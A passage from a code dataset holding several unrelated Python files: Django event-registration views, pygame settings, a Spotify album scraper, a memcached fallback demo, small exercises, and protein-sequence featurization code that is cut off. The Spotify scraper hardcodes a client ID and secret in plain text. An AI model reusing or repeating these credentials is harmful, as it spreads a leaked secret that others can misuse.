render(request, 'EventRegistrationHEApp/login.html')\n\n\n@login_required\ndef dashboard(request):\n countself = ErRegisteredUsers.objects.filter(registration_type='Self').count()\n Group = ErRegisteredUsers.objects.filter(registration_type='Group').count()\n Corporate = ErRegisteredUsers.objects.filter(registration_type='Corporate').count()\n Others = ErRegisteredUsers.objects.filter(registration_type='Others').count()\n results = [countself, Group, Corporate, Others]\n return render(request, 'EventRegistrationHEApp/dashboard.html', context={'a':results})\n\n\ndef home(request):\n return render(request, 'EventRegistrationHEApp/home.html')\n\n\n@login_required\ndef ER_Registered_User(request):\n allusers = ErRegisteredUsers.objects.all().order_by('user_id')\n page = request.GET.get('page', 1)\n paginator = Paginator(allusers, 12)\n try:\n users = paginator.page(page)\n except PageNotAnInteger:\n users = paginator.page(1)\n except EmptyPage:\n users = paginator.page(paginator.num_pages)\n return render(request, 'EventRegistrationHEApp/RegisteredUsers.html', context={'users': users})\n\n\n@login_required\ndef ER_Registered_User_details(request, value):\n if request.method == \"GET\":\n try:\n value = str(value)\n userd = ErRegisteredUsers.objects.get(registration_id=value)\n except ErRegisteredUsers.DoesNotExist:\n userd = None\n return render(request, 'EventRegistrationHEApp/userdetails.html', context={'u': userd})\n\n\ndef thankyou(request):\n cursor = connection.cursor()\n cursor.execute('SELECT \"Registration_ID\" FROM \"EventRegistrationHEApp_erregisteredusers\" ORDER BY \"User_ID\" DESC LIMIT 1')\n regid = cursor.fetchone()\n return render(request, 'EventRegistrationHEApp/thankyou.html', context={'ID': regid[0]})\n\n\ndef registerdata(request):\n if request.method == \"POST\":\n register_form = RegisterForm(data=request.POST)\n print(register_form.is_valid())\n if register_form.is_valid():\n try:\n ruser = register_form.save(commit=False)\n cursor = connection.cursor()\n cursor.execute('SELECT MAX(\"User_ID\")+1 from \"EventRegistrationHEApp_erregisteredusers\"')\n x = cursor.fetchone()\n if x[0] == 'NULL' or x[0] == 'null' or x[0] == None:\n ruser.user_id = 1\n else:\n ruser.user_id = x[0]\n ruser.registration_id = 'A' + str(random.randrange(1000, 99999999))\n ruser.registration_date = datetime.now()\n if 'id_cards' in request.FILES:\n ruser.id_cards = request.FILES['id_cards']\n ruser.save()\n return HttpResponseRedirect(reverse('thankyou'))\n except Exception as e:\n print(e)\n traceback.format_exc()\n else:\n print(register_form.errors)\n else:\n register_form = RegisterForm()\n return render(request, 'EventRegistrationHEApp/registerform.html', {'register_form': register_form})","repo_name":"manu143manoj/Event-Registration","sub_path":"EventRegistrationHEApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35990121732","text":"import os.path\r\n\r\nimport pygame as pg\r\nimport random\r\n\r\n\r\n# define colors, colors work in a (RGB) format.\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255,255,0)\r\nTEAL = (0,255,255)\r\nPINK = (255,0,255)\r\nORANGE = (255,127,0)\r\nDARK_GRAY = (64,64,64)\r\nLIGHT_GRAY = (192,192,192)\r\nGRAY_BLUE = (92,192,194)\r\n\r\ncolors = (WHITE,BLUE,BLACK,RED,GREEN,YELLOW,TEAL,PINK,ORANGE)\r\n\r\n\r\n\r\n#Game Title\r\nTITLE = \"CHANGE ME THIS 
IS WRONG!\"\r\n\r\n\r\n\r\n# Window Settings\r\nWIDTH = 500\r\nHEIGHT = 500\r\nDEFAULT_COLOR = BLACK\r\nTILE_SIZEX = WIDTH/10\r\nTILE_SIZEY = HEIGHT/10\r\n\r\n\r\n# camera settings\r\nfps = 60\r\n\r\n# file locations\r\n#gets location of file on computer\r\ngame_folder = os.path.dirname(__file__)\r\ngame_folder = game_folder.replace(\"\\scripts\",\"\")\r\nsprites_folder = os.path.join(game_folder,\"sprites\")\r\nplayerSprites = os.path.join(sprites_folder,\"playerSprites\")\r\nenemySprites = os.path.join(sprites_folder,\"enemySprites\")\r\n\r\n\r\n\r\n# player Settings\r\nsolidbounds = True\r\nbouncy = False\r\nspawn_invincibility = True\r\nplayer_img = os.path.join(playerSprites,\"roboBoyStill.png\")\r\nplayer_img_move = os.path.join(playerSprites,\"roboBoyMove.png\")\r\nplayer_img_down = os.path.join(playerSprites,\"roboBoyDown.png\")\r\nplayer_img_up = os.path.join(playerSprites,\"roboBoyUp.png\")\r\n\r\n\r\n\r\n# Enemy Settings\r\n\r\nenemy_img = os.path.join(enemySprites,\"enemyStill.png\")\r\nenemyCreep_img = os.path.join(enemySprites,\"enemyCreepy.png\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Hovercraft1774/PygameTemplate","sub_path":"PygameTemplatev2/scripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42726158865","text":"import spotipy\nimport json\nimport h5py\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport sqlite3\nfrom copy import deepcopy\nfrom datetime import datetime\n\n\nconn = sqlite3.connect('/users/bclark66/sp_data_for_tempo_test.db')\ncur = conn.cursor()\n\nclient_credentials_manager = SpotifyClientCredentials(client_id=\"e90c5ed628d443819c60714f29cc8186\",client_secret=\"e7632ab680d44aa3ab55434315075309\")\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\nregional_words = {'chinese', 'taiwan', 'traditional', 'dutch', 'euro', 'israeli', 'swedish', 'celtic',\n'italian', 'french', 'argentine', 'latin', 'spanish', 'czech', 'luxembourgian', 'brazilian', 'hungarian',\n'arab', 'german', 'danish', 'icelandic', 'glam', 'norwegian', 'turkish', 'irish', 'colombian',\n'iraqi', 'thai', 'dominican', 'indian', 'persian', 'lebanese', 'polish', 'chilean', 'sertanejo',\n'swiss', 'belarusian', 'bolivian', 'italo', 'garifuna', 'manila', 'vietnamese', 'indo', 'indonesian',\n'singaporean', 'greek', 'pakistani', 'breton', 'syrian', 'mexican', 'finnish', 'pagan', 'viking',\n'quebec', 'russian', 'romanian', 'wellington', 'cumbia', 'baile', 'latvian', 'serbian', 'slovak',\n'regional', 'suomi', 'japanese', 'croatian', 'lithuanian', 'euskal', 'perth', 'estonian', 'bahamian',\n'guinean', 'mande', 'belgian', 'yugoslav', 'portuguese', 'baltic', 'african', 'armenian', 'kosovan',\n'jewish', 'medieval', 'rune', 'brit', 'slovenian', 'sudanese', 'malian', 'ilocano', 'gothenburg',\n'pinoy', 'anime', 'korean', 'austrian', 'welsh', 'beninese', 'tunisian', 'slavic', 'algerian',\n'bulgarian', 'malaysian', 'puerto', 'rican', 'concepcion', 'maltese', 'bristol', 'galician', 'ecuadorian',\n'cook', 'islands', 'polynesian', 'peruvian', 'catalan', 'montreal', 'venezuelan', 'basque', 'panamanian',\n'nordic', 'rome', 'punjabi', 'paraguayan', 'albanian', 'national'}\n\nclassical_words = {'baroque', 'chamber','classical', 'early music','opera', 'orchestra,romantic'}\njazz_words = {'bebop', 'big band', 'bop','fusion', 'jazz','swing','boogie','Dixieland','jive'}\nrock_words = {'funk','blues','country', 'disco', 'emo', 'folk', 
'grunge', 'indie', 'metal','punk', 'reggae', 'rock', 'screamo'}\nhip_hop_words = {'electro', 'electronica','hip hop', 'house', 'industrial','rap', 'techno', 'trance', 'trap'}\n\ndef flatten_dict(d, result={}, prv_keys=[]):\n for k, v in d.items():\n #print(\"k \",k)\n if isinstance(v, dict):\n flatten_dict(v, result, prv_keys + [k])\n else:\n result['.'.join(prv_keys + [k])] = v\n\n return result\n\ndef get_artist_id(yr,c,jz,r,h,letter):\n \n query = letter + ' year:' + yr\n results = sp.search(query,type='album',limit=50)\n flat_result = flatten_dict(results)\n #print(flat_result.keys())\n #print(flat_result[\"tracks.total\"],\" \",flat_result[\"tracks.next\"],\" \",flat_result[\"tracks.offset\"])\n \n total = flat_result[\"albums.total\"]\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n print(\"starting year: \",yr,current_time,total)\n \n current = 0\n track_count = 0\n classical_tracks_count_needed = c\n jazz_tracks_count_needed = jz\n rock_tracks_count_needed = r\n hip_hop_tracks_count_needed = h\n classical_tracks_count = 0\n jazz_tracks_count = 0\n rock_tracks_count = 0\n hip_hop_tracks_count = 0\n\n while current < total:\n try:\n results = sp.search(query,type='album',limit=50,offset=current)\n except Exception as toomany:\n print(\"# of albums \",current,\" # of tracks \",track_count,toomany)\n #yr,new_current,new_classical_tracks_count,new_jazz_tracks_count,new_rock_tracks_count,new_hip_hop_tracks_count = get_artist_id(yr,c,jz,r,h)\n # classical_tracks_count += new_classical_tracks_count\n # jazz_tracks_count += new_jazz_tracks_count\n # rock_tracks_count += new_rock_tracks_count\n # hip_hop_tracks_count += new_hip_hop_tracks_count\n break\n\n flat_result = flatten_dict(results)\n x = 0\n \n\n for item in flat_result[\"albums.items\"]:\n if 'Live' in item['name'] or 'live' in item['name']:\n continue\n ts = []\n #print(\"album\",item['id'])\n ts.append(item[\"id\"])\n ts.append(item[\"name\"])\n ts.append(item[\"release_date\"])\n ts.append(item[\"release_date_precision\"])\n ts.append(item[\"total_tracks\"])\n ts.append(item[\"type\"])\n ts.append(' ')\n ts.append(' ')\n ts.append(item['href'])\n #trks.append(ts[i])\n \n #print('ts ',ts[i])\n trks = [[0] * 2 for x in range(item['total_tracks'])]\n try:\n tracks_result = sp.album_tracks(ts[0])\n except Exception as notrack:\n print(\"no tracks\",notrack)\n tracks_result = {'items':[]}\n \n track_count = 0\n for track in tracks_result[\"items\"]:\n if 'Live' in track['name'] or 'live' in track['name']:\n continue \n trks[track_count][0] = item['id']\n trks[track_count][1] = track['id']\n track_count += 1\n if track_count > 1:\n break\n\n\n ta = [[0] * 2 for i in range(len(item[\"artists\"]))]\n artists = [[0] * 7 for x in range(len(item['artists']))]\n j = 0\n for row in item[\"artists\"]:\n ta[j][0] = item[\"id\"]\n ta[j][1] = row[\"id\"]\n try:\n artist_result = sp.artist(row['uri'])\n except Exception as noartist:\n print(\"no artist\",noartist)\n break\n #genres = set(artist_result[\"genres\"])\n genre_list = []\n for term in artist_result[\"genres\"]:\n if term == 'hip hop':\n genre_list.append(term)\n else:\n term_list = term.split(\" \")\n for word in term_list:\n genre_list.append(word)\n genres = set(genre_list)\n genre_string = '::'\n genre_strizng = genre_string.join(genre_list)\n artists[j][0] = row[\"id\"]\n artists[j][1] = genre_string\n artists[j][2] = artist_result[\"href\"]\n artists[j][3] = artist_result['name']\n artists[j][4] = artist_result['popularity']\n artists[j][5] = 
artist_result['uri']\n artists[j][6] = artist_result['followers']['total']\n \n \n contains_regional_word = list(genres & regional_words)\n genre_count = 0\n if len(contains_regional_word) > 0:\n print(\"ctw\",genres)\n continue\n contains_classical_word = list(genres & classical_words)\n contains_jazz_word = list(genres & jazz_words)\n contains_rock_word = list(genres & rock_words)\n contains_hip_hop_word = list (genres & hip_hop_words) \n print(\"counts\",classical_tracks_count,jazz_tracks_count,rock_tracks_count,hip_hop_tracks_count)\n\n if len(contains_classical_word) > 0 and classical_tracks_count < classical_tracks_count_needed:\n genre_count += 1\n if len(contains_jazz_word) > 0 and jazz_tracks_count < jazz_tracks_count_needed:\n genre_count += 1\n if len(contains_rock_word) > 0 and rock_tracks_count < rock_tracks_count_needed:\n genre_count +=1\n if len(contains_hip_hop_word) > 0 and hip_hop_tracks_count < hip_hop_tracks_count_needed:\n genre_count +=1\n \n if genre_count == 1:\n try:\n print(\"about to insert album\",ts[0])\n cur.execute('insert into album values (?,?,?,?,?,?,?,?,?)',ts)\n conn.commit()\n #print(\"about to insert album_artist\",ta[j])\n cur.execute('insert into album_artist values (?,?)',ta[j])\n #print(\"about to insert album_track\",trks)\n cur.executemany('insert into album_track VALUES (?,?)', trks)\n #print(\"about to insert artists\",artists[j]) \n cur.execute('insert into artist values(?,?,?,?,?,?,?)',artists[j])\n except Exception as badinsert:\n pass\n #print(\"bad insert\",badinsert,ta[j][1])\n if len(contains_classical_word) > 0:\n classical_tracks_count += track_count\n elif len(contains_jazz_word) > 0:\n jazz_tracks_count += track_count\n elif len(contains_rock_word) > 0:\n rock_tracks_count += track_count\n elif len(contains_hip_hop_word) > 0:\n hip_hop_tracks_count += track_count\n\n \n break \n else:\n print(\"skipped genres\",genres,genre_count,) \n j += 1\n \n\n # # c.executemany('insert into track_artist VALUES (?,?,?)', ta)\n # i += 1 \n offset = flat_result[\"albums.offset\"]\n #c.executemany('INSERT INTO track_search VALUES (?,?,?)', ts)\n \n \n #conn.commit()\n current += 50\n #print(current)\n print(\"year\",yr,\"# of albums \",current,\" # of tracks \",classical_tracks_count,jazz_tracks_count,rock_tracks_count,hip_hop_tracks_count)\n return(yr,current,classical_tracks_count,jazz_tracks_count,rock_tracks_count,hip_hop_tracks_count)\ni = 0\n#for row in c2.execute('SELECT artist_name,count(*) FROM songs group by artist_id order by 2 desc'):\n#for row in c2.execute('select tan.track_id, count(*) from track_search tan left outer join track_analysis ta on ta.track_id = tan.track_id and ta.track_id is null group by tan.track_id'):\n # if i > 60:\n # break\n # #print(row)\n # artist = row[0]\n # get_artist_id(artist)\n # i += 1\njazz_needs = [[1974,7],[1978,9],[1979,15],[1980,39],[1981,23],[1982,13],[1983,17],[1984,20],[1985,2]]\nyr = \"1980\"\nfor needed_year in range(1978,1979):\n for letter in ('a','e','i','o','u','y'):\n # nbr_needed = jazz_needs[needed_year][1]\n # yr = jazz_needs[needed_year][0]\n get_artist_id(str(needed_year),100,100,100,100,letter)\n# for row in c.execute('select distinct track_id from track_artist where track_id not in (select distinct track_id from track_analysis)'):\n# 
trks.append(row[0])\n#print(trks)\n\n","repo_name":"Computational-Cognitive-Musicology-Lab/tempo_stability","sub_path":"code/get_tracks_for_missing_years.py","file_name":"get_tracks_for_missing_years.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72677709585","text":"from pymemcache.client import base\nfrom pymemcache import fallback\n\n\ndef perform_query():\n return 13\n\n\n# set ignore_exc=True to shut down old cache before removing its usage from program\nold_cache = base.Client(('localhost', 32000), ignore_exc=True)\nnew_cache = base.Client(('localhost', 32001))\n\nclient = fallback.FallbackClient((new_cache, old_cache))\n\nresult = client.get('KEY')\n\nif result is None:\n result = perform_query()\n client.set('KEY', result)\n\n\nprint(result)","repo_name":"tmendonca28/Python-Memcached","sub_path":"cold_cache_fallback.py","file_name":"cold_cache_fallback.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24808311046","text":"# Rock Paper Scissors\r\n# A simple rock paper scissors game with 2 players\r\n\r\nchoice = [\"p\", \"r\", \"s\"]\r\nwhile True:\r\n p1 = input(\"Player 1: Rock (r) Paper (p) Scissors (s)\\n = \").lower()\r\n p2 = input(\"Player 2: Rock (r) Paper (p) Scissors (s)\\n = \").lower()\r\n if p1 == p2:\r\n \"Draw!\"\r\n if choice.index(p1) == (choice.index(p2) + 1) % 3:\r\n print(\"Player 2 Wins!\")\r\n elif choice.index(p2) == (choice.index(p1) + 1) % 3:\r\n print(\"Player 1 Wins!\")\r\n\r\n x = input(\"Play another round? (y/n)\\n= \")\r\n if x == \"n\":\r\n break\r\n","repo_name":"andrewzakhartchouk/python_practice","sub_path":"rockpaperscissors/rockpaperscissors.py","file_name":"rockpaperscissors.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20982633251","text":"# Реализовать функцию, принимающую несколько параметров, описывающих данные\n# пользователя: имя, фамилия, год рождения, город проживания, email, телефон.\n# Функция должна принимать параметры как именованные аргументы. Реализовать\n# вывод данных о пользователе одной строкой.\n\ndef print_user_info(**fields):\n \"\"\"\n Выводит данные о пользователе в одну строку\n :param fields: данные о пользователе\n \"\"\"\n output = ''\n for field, value in fields.items():\n output = f'{output}{field}: {value} '\n print(output)\n\n\ndef user_input(func):\n try:\n return func(input(prompt))\n except ValueError:\n print('Некорректный ввод! 
Введите корректные данные')\n\n\nif __name__ == '__main__':\n user = {'имя': str, 'фамилия': str, 'год рождения': int,\n 'город проживания': str, 'email': str, 'телефон': str}\n\n print('Введите данные о пользователе: ')\n for field, value in user.items():\n prompt = f'{field}: '\n success = False\n while not success:\n user[field] = user_input(value)\n success = True\n\n print_user_info(name=user['имя'], surname=user['фамилия'],\n birth_year=user['год рождения'],\n city=user['город проживания'], email=user['email'],\n phone_number=user['телефон'])\n","repo_name":"Nikkurer/gb_py_basics","sub_path":"Lesson_3/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3578841661","text":"\"\"\"\r\nFeaturization code\r\n\"\"\"\r\n\r\nimport os, sys\r\nimport logging\r\nimport tempfile\r\nfrom functools import cache, lru_cache\r\nimport itertools\r\nimport collections\r\nfrom typing import *\r\nfrom functools import cached_property\r\nfrom math import floor\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom transformers import BertTokenizer\r\n\r\nimport muscle\r\nimport utils\r\n\r\n#\r\nAA_TRIPLET_TO_SINGLE = {\r\n \"ARG\": \"R\",\r\n \"HIS\": \"H\",\r\n \"LYS\": \"K\",\r\n \"ASP\": \"D\",\r\n \"GLU\": \"E\",\r\n \"SER\": \"S\",\r\n \"THR\": \"T\",\r\n \"ASN\": \"N\",\r\n \"GLN\": \"Q\",\r\n \"CYS\": \"C\",\r\n \"SEC\": \"U\",\r\n \"GLY\": \"G\",\r\n \"PRO\": \"P\",\r\n \"ALA\": \"A\",\r\n \"VAL\": \"V\",\r\n \"ILE\": \"I\",\r\n \"LEU\": \"L\",\r\n \"MET\": \"M\",\r\n \"PHE\": \"F\",\r\n \"TYR\": \"Y\",\r\n \"TRP\": \"W\",\r\n}\r\nAA_SINGLE_TO_TRIPLET = {v: k for k, v in AA_TRIPLET_TO_SINGLE.items()}\r\n\r\n# 21 amino acids\r\nAMINO_ACIDS = \"RHKDESTNQCUGPAVILMFYW\"\r\nassert len(AMINO_ACIDS) == 21\r\nassert all([x == y for x, y in zip(AMINO_ACIDS, AA_TRIPLET_TO_SINGLE.values())])\r\nAMINO_ACIDS_TO_IDX = {aa: i for i, aa in enumerate(AMINO_ACIDS)}\r\n\r\n# Pad with $ character\r\nPAD = \"$\"\r\nMASK = \".\"\r\nUNK = \"?\"\r\nSEP = \"|\"\r\nCLS = \"*\"\r\nAMINO_ACIDS_WITH_ALL_ADDITIONAL = AMINO_ACIDS + PAD + MASK + UNK + SEP + CLS\r\nAMINO_ACIDS_WITH_ALL_ADDITIONAL_TO_IDX = {\r\n aa: i for i, aa in enumerate(AMINO_ACIDS_WITH_ALL_ADDITIONAL)\r\n}\r\n\r\n\r\nclass SequenceMasker:\r\n \"\"\"Mask one position in each sequence for evaluation (NOT FOR TRAINING)\"\"\"\r\n\r\n def __init__(self, seq: Union[str, List[str]], seed: int = 4581):\r\n self._seed = seed\r\n self.rng = np.random.default_rng(seed=seed)\r\n self.unmasked = [seq] if isinstance(seq, str) else seq\r\n self._masked_indices = []\r\n self.unmasked_msa = muscle.run_muscle(self.unmasked)\r\n\r\n @cached_property\r\n def masked(self) -> List[str]:\r\n retval = []\r\n for unmasked in self.unmasked:\r\n aa = list(unmasked)\r\n mask_idx = self.rng.integers(0, len(aa))\r\n assert 0 <= mask_idx < len(aa)\r\n self._masked_indices.append(mask_idx)\r\n aa[mask_idx] = MASK\r\n retval.append(\" \".join(aa)) # Space is necessary for tokenizer\r\n assert len(self._masked_indices) == len(self)\r\n return retval\r\n\r\n @cached_property\r\n def masked_truth(self) -> List[str]:\r\n \"\"\"Return the masked amino acids\"\"\"\r\n _ = self.masked # Ensure that this has been generated\r\n return [\r\n self.unmasked[i][mask_idx]\r\n for i, mask_idx in enumerate(self._masked_indices)\r\n ]\r\n\r\n def __len__(self) -> int:\r\n return len(self.unmasked)\r\n\r\n def get_naive_predictions(\r\n self,\r\n k: int,\r\n method: 
Literal[\r\n \"most_common\", \"random\", \"most_common_positional\"\r\n ] = \"most_common\",\r\n ) -> List[List[str]]:\r\n \"\"\"\r\n Return naive predictions for each of the masked sequences\r\n Each entry in the list is a list of the top k predictions\r\n \"\"\"\r\n if method == \"most_common\":\r\n cnt = collections.Counter()\r\n for seq in self.unmasked:\r\n cnt.update(seq)\r\n top_k = [k for k, v in cnt.most_common(k)]\r\n return [top_k] * len(self)\r\n elif method == \"most_common_positional\":\r\n # Create a matrix where each row corresponds to a position\r\n max_len = len(self.unmasked_msa[0])\r\n seqs_matrix = np.stack([np.array(list(s)) for s in self.unmasked_msa]).T\r\n assert seqs_matrix.shape == (max_len, len(self))\r\n\r\n # Per-position predictions\r\n per_pos_most_common = []\r\n for i in range(max_len):\r\n # Excludes padding bases\r\n cnt = collections.Counter(\r\n [aa for aa in seqs_matrix[i] if aa in AMINO_ACIDS]\r\n )\r\n per_pos_most_common.append([aa for aa, _n, in cnt.most_common(k)])\r\n #\r\n retval = [per_pos_most_common[i] for i in self._masked_indices]\r\n return retval\r\n elif method == \"random\":\r\n baseline_naive_rng = np.random.default_rng(seed=self._seed)\r\n retval = []\r\n for _i in range(len(self)):\r\n idx = [\r\n baseline_naive_rng.integers(0, len(AMINO_ACIDS)) for _j in range(k)\r\n ]\r\n retval.append([AMINO_ACIDS[i] for i in idx])\r\n return retval\r\n else:\r\n raise ValueError(f\"Unrecognized method: {method}\")\r\n\r\n\r\ndef adheres_to_vocab(s: str, vocab: str = AMINO_ACIDS) -> bool:\r\n \"\"\"\r\n Returns whether a given string contains only characters from vocab\r\n >>> adheres_to_vocab(\"RKDES\")\r\n True\r\n >>> adheres_to_vocab(AMINO_ACIDS + AMINO_ACIDS)\r\n True\r\n \"\"\"\r\n return set(s).issubset(set(vocab))\r\n\r\n\r\ndef write_vocab(vocab: Iterable[str], fname: str) -> str:\r\n \"\"\"\r\n Write the vocabulary to the fname, one entry per line\r\n Mostly for compatibility with transformer BertTokenizer\r\n \"\"\"\r\n with open(fname, \"w\") as sink:\r\n for v in vocab:\r\n sink.write(v + \"\\n\")\r\n return fname\r\n\r\n\r\ndef get_aa_bert_tokenizer(\r\n max_len: int = 64, d=AMINO_ACIDS_WITH_ALL_ADDITIONAL_TO_IDX\r\n) -> BertTokenizer:\r\n \"\"\"\r\n Tokenizer for amino acid sequences. Not *exactly* the same as BertTokenizer\r\n but mimics its behavior, encoding start with CLS and ending with SEP\r\n\r\n >>> get_aa_bert_tokenizer(10).encode(insert_whitespace(\"RKDES\"))\r\n [25, 0, 2, 3, 4, 5, 24]\r\n \"\"\"\r\n with tempfile.TemporaryDirectory() as tempdir:\r\n vocab_fname = write_vocab(d, os.path.join(tempdir, \"vocab.txt\"))\r\n tok = BertTokenizer(\r\n vocab_fname,\r\n do_lower_case=False,\r\n do_basic_tokenize=True,\r\n tokenize_chinese_chars=False,\r\n pad_token=PAD,\r\n mask_token=MASK,\r\n unk_token=UNK,\r\n sep_token=SEP,\r\n cls_token=CLS,\r\n model_max_len=max_len,\r\n padding_side=\"right\",\r\n )\r\n return tok\r\n\r\n\r\ndef get_pretrained_bert_tokenizer(path: str) -> BertTokenizer:\r\n \"\"\"Get the pretrained BERT tokenizer from given path\"\"\"\r\n tok = BertTokenizer.from_pretrained(\r\n path,\r\n do_basic_tokenize=False,\r\n do_lower_case=False,\r\n tokenize_chinese_chars=False,\r\n unk_token=UNK,\r\n sep_token=SEP,\r\n pad_token=PAD,\r\n cls_token=CLS,\r\n mask_token=MASK,\r\n padding_side=\"right\",\r\n )\r\n return tok\r\n\r\n\r\ndef mask_for_training(seq: str, prob: float = 0.15):\r\n \"\"\"\r\n Manually mask for training. 
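    # -- Editor's aside (standalone toy sketch of the same MLM recipe, not
    # part of this module) -- pick ~prob of the tokens, keep their true ids
    # as targets (-100 elsewhere so the loss ignores unmasked positions),
    # then overwrite the picked tokens with the mask symbol:
    #
    #     import numpy as np
    #     VOCAB = {aa: i for i, aa in enumerate('RHKDESTNQCUGPAVILMFYW')}
    #     def toy_mask(tokens, prob=0.15, seed=0):
    #         rng = np.random.default_rng(seed)
    #         tokens = np.array(tokens)
    #         target = np.full(len(tokens), -100, dtype=np.int64)
    #         picked = rng.random(len(tokens)) <= prob
    #         target[picked] = [VOCAB[t] for t in tokens[picked]]
    #         tokens[picked] = '.'
    #         return target, tokens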
Expects 'spaced' input\r\n \"\"\"\r\n aa = np.array(seq.split())\r\n assert len(aa) > 1\r\n target = np.zeros_like(aa, dtype=np.int64) - 100\r\n mask = np.random.random(len(aa)) <= prob\r\n masked_aa = aa[mask]\r\n target[mask] = [AMINO_ACIDS_TO_IDX[a] for a in masked_aa]\r\n aa[mask] = MASK\r\n assert target.shape == aa.shape\r\n return target, \" \".join(aa)\r\n\r\n\r\ndef one_hot(seq: str, alphabet: Optional[str] = AMINO_ACIDS) -> np.ndarray:\r\n \"\"\"\r\n One-hot encode the input string. Since pytorch convolutions expect\r\n input of (batch, channel, length), we return shape (channel, length)\r\n When one hot encoding, we ignore the pad characters, encoding them as\r\n a vector of 0's instead\r\n \"\"\"\r\n if not seq:\r\n assert alphabet\r\n return np.zeros((len(alphabet), 1), dtype=np.float32)\r\n if not alphabet:\r\n alphabet = utils.dedup(seq)\r\n logging.info(f\"No alphabet given, assuming alphabet of: {alphabet}\")\r\n seq_arr = np.array(list(seq))\r\n # This implementation naturally ignores the pad character if not provided\r\n # in the alphabet\r\n retval = np.stack([seq_arr == char for char in alphabet]).astype(float).T\r\n assert len(retval) == len(seq), f\"Mismatched lengths: {len(seq)} {retval.shape}\"\r\n return retval.astype(np.float32).T\r\n\r\n\r\ndef idx_encode(\r\n seq: str, alphabet_idx: Dict[str, int] = AMINO_ACIDS_WITH_ALL_ADDITIONAL_TO_IDX\r\n) -> np.ndarray:\r\n \"\"\"\r\n Encode the sequence as the indices in the alphabet\r\n >>> idx_encode(\"CAFEVVGQLTF\")\r\n array([ 9, 13, 18, 4, 14, 14, 11, 8, 16, 6, 18], dtype=int32)\r\n \"\"\"\r\n retval = np.array([alphabet_idx[aa] for aa in seq], dtype=np.int32)\r\n return retval\r\n\r\n\r\ndef pad_or_trunc_sequence(seq: str, l: int, right_align: bool = False, pad=PAD) -> str:\r\n \"\"\"\r\n Pad the given sequence to the given length\r\n >>> pad_or_trunc_sequence(\"RKDES\", 8, right_align=False)\r\n 'RKDES$$$'\r\n >>> pad_or_trunc_sequence(\"RKDES\", 8, right_align=True)\r\n '$$$RKDES'\r\n >>> pad_or_trunc_sequence(\"RKDESRKRKR\", 3, right_align=False)\r\n 'RKD'\r\n >>> pad_or_trunc_sequence(\"RKDESRRK\", 3, right_align=True)\r\n 'RRK'\r\n \"\"\"\r\n delta = len(seq) - l\r\n if len(seq) > l:\r\n if right_align:\r\n retval = seq[delta:]\r\n else:\r\n retval = seq[:-delta]\r\n elif len(seq) < l:\r\n insert = pad * np.abs(delta)\r\n if right_align:\r\n retval = insert + seq\r\n else:\r\n retval = seq + insert\r\n else:\r\n retval = seq\r\n assert len(retval) == l, f\"Got mismatched lengths: {len(retval)} {l}\"\r\n return retval\r\n\r\n\r\ndef is_whitespaced(seq: str) -> bool:\r\n \"\"\"\r\n Return whether the sequence has whitespace inserted\r\n >>> is_whitespaced(\"R K D E S\")\r\n True\r\n >>> is_whitespaced(\"RKDES\")\r\n False\r\n >>> is_whitespaced(\"R K D ES\")\r\n False\r\n >>> is_whitespaced(\"R\")\r\n True\r\n >>> is_whitespaced(\"RK\")\r\n False\r\n >>> is_whitespaced(\"R K\")\r\n True\r\n \"\"\"\r\n tok = list(seq)\r\n spaces = [t for t in tok if t.isspace()]\r\n if len(spaces) == floor(len(seq) / 2):\r\n return True\r\n return False\r\n\r\n\r\ndef insert_whitespace(seq: str) -> str:\r\n \"\"\"\r\n Return the sequence of characters with whitespace after each char\r\n >>> insert_whitespace(\"RKDES\")\r\n 'R K D E S'\r\n \"\"\"\r\n return \" \".join(list(seq))\r\n\r\n\r\ndef remove_whitespace(seq: str) -> str:\r\n \"\"\"\r\n Remove whitespace from the given sequence\r\n >>> remove_whitespace(\"R K D E S\")\r\n 'RKDES'\r\n >>> remove_whitespace(\"R K D RR K\")\r\n 'RKDRRK'\r\n >>> remove_whitespace(\"RKIL\")\r\n 
'RKIL'\r\n \"\"\"\r\n return \"\".join(seq.split())\r\n\r\n\r\n@cache\r\ndef all_possible_kmers(alphabet: Iterable[str] = AMINO_ACIDS, k: int = 3) -> List[str]:\r\n \"\"\"\r\n Return all possible kmers\r\n \"\"\"\r\n return [\"\".join(k) for k in itertools.product(*[alphabet for _ in range(k)])]\r\n\r\n\r\n@lru_cache(maxsize=128)\r\ndef kmer_ft(\r\n seq: str, k: int = 3, size_norm: bool = False, alphabet: Iterable[str] = AMINO_ACIDS\r\n) -> np.ndarray:\r\n \"\"\"\r\n Kmer featurization to sequence\r\n \"\"\"\r\n kmers = [seq[i : i + k] for i in range(0, len(seq) - k + 1)]\r\n kmers_to_idx = {\r\n k: i for i, k in enumerate(all_possible_kmers(alphabet=alphabet, k=k))\r\n }\r\n kmers = [k for k in kmers if k in kmers_to_idx]\r\n idx = np.array([kmers_to_idx[k] for k in kmers])\r\n retval = np.zeros(len(kmers_to_idx))\r\n np.add.at(retval, idx, 1)\r\n assert np.sum(retval) == len(kmers)\r\n if size_norm:\r\n retval /= len(kmers)\r\n return retval\r\n\r\n\r\ndef main():\r\n \"\"\"On the fly 